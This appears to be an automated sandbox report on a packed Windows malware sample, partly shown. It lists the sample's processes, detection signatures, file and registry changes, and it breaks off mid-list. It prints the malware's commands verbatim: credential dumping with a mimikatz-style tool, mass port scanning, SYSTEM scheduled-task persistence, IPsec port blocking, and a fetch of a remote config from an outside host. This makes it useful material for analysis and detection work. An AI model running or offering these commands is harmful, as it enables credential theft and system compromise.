
Exes_e77b8548080e4a20eb74f40003cb9b42_exe_2019-06-24_20_30.json

  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_e77b8548080e4a20eb74f40003cb9b42.exe"
  7. [*] File Size: 5427200
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  9. [*] SHA256: "0105905704b61fcdebe72c1f344237df510451e1bad08986c8629d9857084e0c"
  10. [*] MD5: "e77b8548080e4a20eb74f40003cb9b42"
  11. [*] SHA1: "fdefa723f8f48227b28fd750dece152a3fb8d8c2"
  12. [*] SHA512: "551b574502257f3a95f8d6b1ceb798ef69f793bcf5e8eb5425644c3b6e8a98ee84cbad856c57a4faa6fdb954e34db1093b5e05f186d0d0d102da23f166a59201"
  13. [*] CRC32: "0F1DD1BB"
  14. [*] SSDEEP: "98304:gKq+Q2ru+FBpaizgQA0JzpxsMnuviWyUGGKo8YXBfZcH8AKqkWC6ssZWjACGDZH/:S1g59A0JznXoiYG8M+oFZ0ACFA1o"
  15.  
  16. [*] Process Execution: [
  17. "Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
  18. "cmd.exe",
  19. "PING.EXE",
  20. "ghllihr.exe",
  21. "services.exe",
  22. "ghllihr.exe",
  23. "cmd.exe",
  24. "cmd.exe",
  25. "cacls.exe",
  26. "cmd.exe",
  27. "cacls.exe",
  28. "cmd.exe",
  29. "cacls.exe",
  30. "netsh.exe",
  31. "netsh.exe",
  32. "netsh.exe",
  33. "cmd.exe",
  34. "wpcap.exe",
  35. "net.exe",
  36. "net1.exe",
  37. "net.exe",
  38. "net1.exe",
  39. "net.exe",
  40. "net1.exe",
  41. "net.exe",
  42. "net1.exe",
  43. "cmd.exe",
  44. "net.exe",
  45. "net1.exe",
  46. "cmd.exe",
  47. "pygejcepu.exe",
  48. "cmd.exe",
  49. "vfshost.exe",
  50. "cmd.exe",
  51. "cmd.exe",
  52. "schtasks.exe",
  53. "cmd.exe",
  54. "cmd.exe",
  55. "schtasks.exe",
  56. "cmd.exe",
  57. "cmd.exe",
  58. "schtasks.exe",
  59. "netsh.exe",
  60. "netsh.exe",
  61. "netsh.exe",
  62. "netsh.exe",
  63. "urpjswrnu.exe",
  64. "netsh.exe",
  65. "netsh.exe",
  66. "svchost.exe",
  67. "svchost.exe",
  68. "svchost.exe",
  69. "muemii.exe"
  70. ]
  71.  
  72. [*] Signatures Detected: [
  73. {
  74. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  75. "Details": [
  76. {
  77. "IP": "192.35.177.64:80"
  78. },
  79. {
  80. "IP": "2.21.71.25:80"
  81. }
  82. ]
  83. },
  84. {
  85. "Description": "Possible date expiration check, exits too soon after checking local time",
  86. "Details": [
  87. {
  88. "process": "cmd.exe, PID 2444"
  89. }
  90. ]
  91. },
  92. {
  93. "Description": "Creates RWX memory",
  94. "Details": []
  95. },
  96. {
  97. "Description": "Loads a driver",
  98. "Details": [
  99. {
  100. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\npf"
  101. }
  102. ]
  103. },
  104. {
  105. "Description": "Expresses interest in specific running processes",
  106. "Details": [
  107. {
  108. "process": "lsass.exe"
  109. },
  110. {
  111. "process": "services.exe"
  112. },
  113. {
  114. "process": "csrss.exe"
  115. },
  116. {
  117. "process": "svchost.exe"
  118. },
  119. {
  120. "process": "[System Process]"
  121. },
  122. {
  123. "process": "spoolsv.exe"
  124. },
  125. {
  126. "process": "wininit.exe"
  127. },
  128. {
  129. "process": "pygejcepu.exe"
  130. },
  131. {
  132. "process": "winlogon.exe"
  133. },
  134. {
  135. "process": "lsm.exe"
  136. }
  137. ]
  138. },
  139. {
  140. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  141. "Details": []
  142. },
  143. {
  144. "Description": "Reads data out of its own binary image",
  145. "Details": [
  146. {
  147. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x00000200"
  148. },
  149. {
  150. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x0000c000"
  151. },
  152. {
  153. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000200, length: 0x00069f39"
  154. },
  155. {
  156. "self_read": "process: wpcap.exe, pid: 1348, offset: 0x0000c01c, length: 0x0005e121"
  157. }
  158. ]
  159. },
  160. {
  161. "Description": "Performs some HTTP requests",
  162. "Details": [
  163. {
  164. "url": "http://uio.hognoob.se:63145/cfg.ini"
  165. },
  166. {
  167. "url": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D"
  168. },
  169. {
  170. "url": "http://crl.identrust.com/DSTROOTCAX3CRL.crl"
  171. }
  172. ]
  173. },
  174. {
  175. "Description": "The binary likely contains encrypted or compressed data.",
  176. "Details": [
  177. {
  178. "section": "name: UPX1, entropy: 7.82, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0052c800, virtual_size: 0x0052d000"
  179. }
  180. ]
  181. },
  182. {
  183. "Description": "The executable is compressed using UPX",
  184. "Details": [
  185. {
  186. "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00170000"
  187. }
  188. ]
  189. },
  190. {
  191. "Description": "Deletes its original binary from disk",
  192. "Details": []
  193. },
  194. {
  195. "Description": "Forces a created process to be the child of an unrelated process",
  196. "Details": []
  197. },
  198. {
  199. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  200. "Details": [
  201. {
  202. "Process": "netsh.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds"
  203. },
  204. {
  205. "Process": "ghllihr.exe tried to sleep 7129 seconds, actually delayed analysis time by 0 seconds"
  206. }
  207. ]
  208. },
  209. {
  210. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  211. "Details": [
  212. {
  213. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5180833 times"
  214. }
  215. ]
  216. },
  217. {
  218. "Description": "Attempts to execute a Living Off The Land Binary command for post exploitation",
  219. "Details": [
  220. {
  221. "MITRE T1053 (Scheduled Task/Job) - schtasks": "(Tactic: Execution, Persistence, Privilege Escalation)"
  222. }
  223. ]
  224. },
  225. {
  226. "Description": "Mimics the file times of a Windows system file",
  227. "Details": [
  228. {
  229. "mimic_dest": "C:\\Program Files\\WinPcap\\LICENSE",
  230. "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
  231. },
  232. {
  233. "mimic_dest": "C:\\Program Files\\WinPcap\\rpcapd.exe",
  234. "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
  235. }
  236. ]
  237. },
  238. {
  239. "Description": "Installs itself for autorun at Windows startup",
  240. "Details": [
  241. {
  242. "service name": "tqbseelza"
  243. },
  244. {
  245. "service path": "C:\\Windows\\crznklud\\ghllihr.exe"
  246. },
  247. {
  248. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath"
  249. },
  250. {
  251. "data": "system32\\drivers\\npf.sys"
  252. },
  253. {
  254. "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\""
  255. }
  256. ]
  257. },
  258. {
  259. "Description": "Creates a hidden or system file",
  260. "Details": [
  261. {
  262. "file": "C:\\Windows\\crznklud\\svschost.xml"
  263. },
  264. {
  265. "file": "C:\\Windows\\crznklud\\spoolsrv.xml"
  266. },
  267. {
  268. "file": "C:\\Windows\\crznklud\\vimpcsvc.xml"
  269. },
  270. {
  271. "file": "C:\\Windows\\crznklud\\docmicfg.xml"
  272. },
  273. {
  274. "file": "C:\\Windows\\crznklud\\schoedcl.xml"
  275. }
  276. ]
  277. },
  278. {
  279. "Description": "The sample wrote data to the system hosts file.",
  280. "Details": []
  281. },
  282. {
  283. "Description": "Collects information to fingerprint the system",
  284. "Details": []
  285. },
  286. {
  287. "Description": "Installs WinPCAP",
  288. "Details": [
  289. {
  290. "file": "C:\\Windows\\System32\\Packet.dll"
  291. }
  292. ]
  293. }
  294. ]
  295.  
  296. [*] Started Service: [
  297. "tqbseelza",
  298. "WerSvc",
  299. "PolicyAgent",
  300. "npf"
  301. ]
  302.  
  303. [*] Executed Commands: [
  304. "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crznklud\\ghllihr.exe",
  305. "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
  306. "C:\\Windows\\crznklud\\ghllihr.exe",
  307. "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
  308. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  309. "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
  310. "netsh ipsec static del all",
  311. "netsh ipsec static add policy name=Bastards description=FuckingBastards",
  312. "netsh ipsec static add filteraction name=BastardsList action=block",
  313. "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
  314. "cmd /c net start npf",
  315. "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
  316. "cmd /c C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
  317. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
  318. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
  319. "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\"",
  320. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
  321. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
  322. "netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList",
  323. "netsh ipsec static set policy name=Bastards assign=y",
  324. "C:\\Windows\\TEMP\\zjbrqggku\\urpjswrnu.exe -accepteula -mp 1128 C:\\Windows\\TEMP\\zjbrqggku\\1128.dmp",
  325. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
  326. "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
  327. "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
  328. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
  329. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
  330. "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
  331. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
  332. "net stop \"Boundary Meter\"",
  333. "net stop \"TrueSight Meter\"",
  334. "net stop npf",
  335. "net start npf",
  336. "C:\\Windows\\system32\\net1 stop \"Boundary Meter\"",
  337. "C:\\Windows\\system32\\net1 stop \"TrueSight Meter\"",
  338. "C:\\Windows\\system32\\net1 stop npf",
  339. "C:\\Windows\\system32\\net1 start npf",
  340. "net start npf",
  341. "C:\\Windows\\system32\\net1 start npf",
  342. "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
  343. "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit",
  344. "schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
  345. "schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
  346. "schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\""
  347. ]
  348.  
  349. [*] Mutexes: [
  350. "IESQMMUTEX_0_208"
  351. ]
  352.  
  353. [*] Modified Files: [
  354. "C:\\Windows\\crznklud\\ghllihr.exe",
  355. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\TemporaryFile",
  356. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
  357. "C:\\Windows\\System32\\drivers\\etc\\hosts",
  358. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe",
  359. "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe",
  360. "C:\\Windows\\zjbrqggku\\rtalrauta\\Packet.dll",
  361. "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.dll",
  362. "C:\\Windows\\zjbrqggku\\rtalrauta\\lblgpauls.exe",
  363. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\cnli-1.dll",
  364. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\coli-0.dll",
  365. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\crli-0.dll",
  366. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\exma-1.dll",
  367. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libeay32.dll",
  368. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libxml2.dll",
  369. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\posh-0.dll",
  370. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ssleay32.dll",
  371. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tibe-2.dll",
  372. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trch-1.dll",
  373. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trfo-2.dll",
  374. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tucl-1.dll",
  375. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ucl.dll",
  376. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\xdvl-0.dll",
  377. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\zlib1.dll",
  378. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.exe",
  379. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.exe",
  380. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.exe",
  381. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.exe",
  382. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.exe",
  383. "C:\\Windows\\zjbrqggku\\UnattendGC\\svschost.xml",
  384. "C:\\Windows\\zjbrqggku\\UnattendGC\\spoolsrv.xml",
  385. "C:\\Windows\\zjbrqggku\\UnattendGC\\vimpcsvc.xml",
  386. "C:\\Windows\\zjbrqggku\\UnattendGC\\docmicfg.xml",
  387. "C:\\Windows\\zjbrqggku\\UnattendGC\\schoedcl.xml",
  388. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.xml",
  389. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.xml",
  390. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.xml",
  391. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.xml",
  392. "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.xml",
  393. "C:\\Windows\\crznklud\\svschost.xml",
  394. "C:\\Windows\\crznklud\\spoolsrv.xml",
  395. "C:\\Windows\\crznklud\\vimpcsvc.xml",
  396. "C:\\Windows\\crznklud\\docmicfg.xml",
  397. "C:\\Windows\\crznklud\\schoedcl.xml",
  398. "C:\\Windows\\zjbrqggku\\UnattendGC\\Shellcode.ini",
  399. "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture64.dll",
  400. "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture32.dll",
  401. "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe",
  402. "C:\\Windows\\zjbrqggku\\Corporate\\mimidrv.sys",
  403. "C:\\Windows\\zjbrqggku\\Corporate\\mimilib.dll",
  404. "C:\\Windows\\zjbrqggku\\upbdrjv\\swrpwe.exe",
  405. "C:\\Windows\\IME\\ghllihr.exe",
  406. "C:\\Windows\\Temp\\zjbrqggku\\urpjswrnu.exe",
  407. "C:\\Windows\\Temp\\nbkteejuk\\muemii.exe",
  408. "C:\\Windows\\Temp\\nbkteejuk\\config.json",
  409. "C:\\Windows\\Temp\\20882968\\....\\TemporaryFile",
  410. "C:\\Windows\\Temp\\20882968\\TemporaryFile",
  411. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
  412. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
  413. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\644B8874112055B5E195ECB0E8F243A4",
  414. "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\644B8874112055B5E195ECB0E8F243A4",
  415. "\\Device\\NamedPipe",
  416. "\\Device\\Http\\Communication",
  417. "C:\\Windows\\Temp\\nsm5019.tmp",
  418. "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
  419. "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
  420. "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
  421. "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
  422. "C:\\Windows\\System32\\pthreadVC.dll",
  423. "C:\\Windows\\System32\\wpcap.dll",
  424. "C:\\Windows\\System32\\Packet.dll",
  425. "C:\\Program Files\\WinPcap\\rpcapd.exe",
  426. "C:\\Program Files\\WinPcap\\LICENSE",
  427. "C:\\Program Files\\WinPcap\\uninstall.exe",
  428. "C:\\Windows\\sysnative\\drivers\\npf.sys",
  429. "C:\\Windows\\sysnative\\wpcap.dll",
  430. "C:\\Windows\\sysnative\\Packet.dll",
  431. "\\??\\Global\\NPF_{CFCD29B3-A836-426F-8329-8362EC941293}",
  432. "\\??\\Global\\NPF_{D720734D-0C14-4C25-829D-F6B4814978B3}",
  433. "\\??\\Global\\NPF_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}",
  434. "\\??\\Global\\NPF_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}",
  435. "\\??\\Global\\NPF_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}",
  436. "\\??\\Global\\NPF_NdisWanIpv6",
  437. "\\??\\Global\\NPF_NdisWanBh",
  438. "\\??\\Global\\NPF_{8C8DAC1D-0390-4B59-BF93-EC6C9E68D36A}",
  439. "\\??\\Global\\NPF_NdisWanIp",
  440. "\\??\\Global\\NPF_{BFA735C0-8C32-4848-B88D-FA17C2729720}",
  441. "\\??\\Global\\NPF_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}",
  442. "\\??\\Global\\NPF_{D25DE530-2291-4668-A771-4DAC18E7B55D}",
  443. "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
  444. "C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
  445. "C:\\Windows\\sysnative\\Tasks\\trztipllt",
  446. "C:\\Windows\\Temp\\zjbrqggku\\1128.dmp",
  447. "\\??\\Global\\ProcmonDebugLogger"
  448. ]
  449.  
  450. [*] Deleted Files: [
  451. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
  452. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\",
  453. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile\\TemporaryFile",
  454. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
  455. "C:\\Users\\user\\AppData\\Local\\Temp\\13802656",
  456. "C:\\Windows\\zjbrqggku\\rtalrauta\\ip.txt",
  457. "C:\\Windows\\zjbrqggku\\rtalrauta\\Result.txt",
  458. "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
  459. "C:\\Windows\\Temp\\nbkteejuk\\config.json",
  460. "C:\\Windows\\Temp\\20882968\\....\\",
  461. "C:\\Windows\\Temp\\20882968\\TemporaryFile\\TemporaryFile",
  462. "C:\\Windows\\Temp\\20882968\\TemporaryFile",
  463. "C:\\Windows\\Temp\\20882968",
  464. "C:\\Windows\\Temp\\nsg4FF8.tmp",
  465. "C:\\Windows\\Temp\\nsm501A.tmp",
  466. "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
  467. "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
  468. "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
  469. "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
  470. "C:\\Windows\\Temp\\nsm501A.tmp\\",
  471. "C:\\Windows\\Tasks\\trztipllt.job"
  472. ]
  473.  
  474. [*] Modified Registry Keys: [
  475. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
  476. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
  477. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf",
  478. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Type",
  479. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Start",
  480. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ErrorControl",
  481. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath",
  482. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\DisplayName",
  483. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\WOW64",
  484. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  485. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
  486. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  487. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
  488. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
  489. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
  490. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
  491. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
  492. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
  493. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
  494. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
  495. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
  496. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
  497. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
  498. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
  499. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
  500. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
  501. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
  502. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
  503. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}",
  504. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\className",
  505. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\name",
  506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecID",
  507. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecDataType",
  508. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecData",
  509. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\whenChanged",
  510. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}",
  511. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\className",
  512. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\name",
  513. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecID",
  514. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyAction",
  515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyType",
  516. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecDataType",
